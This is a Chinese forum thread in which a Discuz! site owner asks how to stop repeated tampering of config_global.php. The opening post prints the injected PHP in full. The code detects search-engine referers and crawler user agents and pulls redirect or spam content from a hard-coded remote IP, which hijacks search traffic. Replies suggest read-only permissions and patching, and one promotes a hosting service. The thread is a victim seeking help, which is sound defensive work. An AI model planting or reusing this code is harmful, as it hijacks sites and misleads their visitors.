找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 7582|回复: 3

[求助] DZ的config_global.php文件被篡改,导致百度搜索被劫持,请教大神怎么解决?

[复制链接]
发表于 2016-7-21 22:32:55 | 显示全部楼层 |阅读模式 来自 中国–湖北–荆门
config_global.php文件被 修改,注入以下代码,手动删除后,过几个小时又被修改,请各位大神指导解决,谢谢!!!

set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http://104.202.66.185/');
define('s_s','@haosou.com|360.cn|baidu|spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$diconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}


发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;

如何回报帮助你解决问题的坛友,好办法就是点击帖子下方的评分按钮给对方加【金币】不会扣除自己的积分,做一个热心并受欢迎的人!

发表于 2016-7-22 09:40:12 | 显示全部楼层 来自 中国–河南
这么乱呀!你可以把这个文件设置成只读哦

另外检查一下你所用的dz版本是否有补丁发布,有的话记住打好补丁,另外做好服务器安全;

有兴趣的话可以加一下 飘仙的qq群哦

评分

参与人数 1金币 +3 收起 理由
抢楼评分专号 + 3 很幸运,你获得了抢楼奖励!

查看全部评分

发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;

如何回报帮助你解决问题的坛友,好办法就是点击帖子下方的评分按钮给对方加【金币】不会扣除自己的积分,做一个热心并受欢迎的人!

回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-7-23 09:00:14 | 显示全部楼层 来自 中国–湖北–荆门
天外飘仙 发表于 2016-7-22 09:40
这么乱呀!你可以把这个文件设置成只读哦

另外检查一下你所用的dz版本是否有补丁发布,有的话记住打好补 ...

谢谢,用的win2008r2 的服务器,最近总是遭到攻击,

点评

不客气的; 需要的话 以后可以考虑一下 飘仙这边的 云服务器 哦,免费提供技术支持http://www.zgwen.net/services/CloudHost/  详情 回复 发表于 2016-7-23 16:40

发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;

如何回报帮助你解决问题的坛友,好办法就是点击帖子下方的评分按钮给对方加【金币】不会扣除自己的积分,做一个热心并受欢迎的人!

回复 支持 反对

使用道具 举报

发表于 2016-7-23 16:40:52 | 显示全部楼层 来自 中国–河南
奔跑的乌龟 发表于 2016-7-23 09:00
谢谢,用的win2008r2 的服务器,最近总是遭到攻击,

不客气的;

需要的话 以后可以考虑一下 飘仙这边的 云服务器 哦,免费提供技术支持http://www.wensuhulian.com/services/CloudHost/

发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;

如何回报帮助你解决问题的坛友,好办法就是点击帖子下方的评分按钮给对方加【金币】不会扣除自己的积分,做一个热心并受欢迎的人!

回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则 需要先绑定手机号

关闭

站长推荐上一条 /1 下一条

QQ|侵权投诉|广告报价|手机版|小黑屋|西部数码代理|飘仙建站论坛 ( 豫ICP备2022021143号-1 )

GMT+8, 2024-12-23 12:40 , Processed in 0.056096 second(s), 14 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表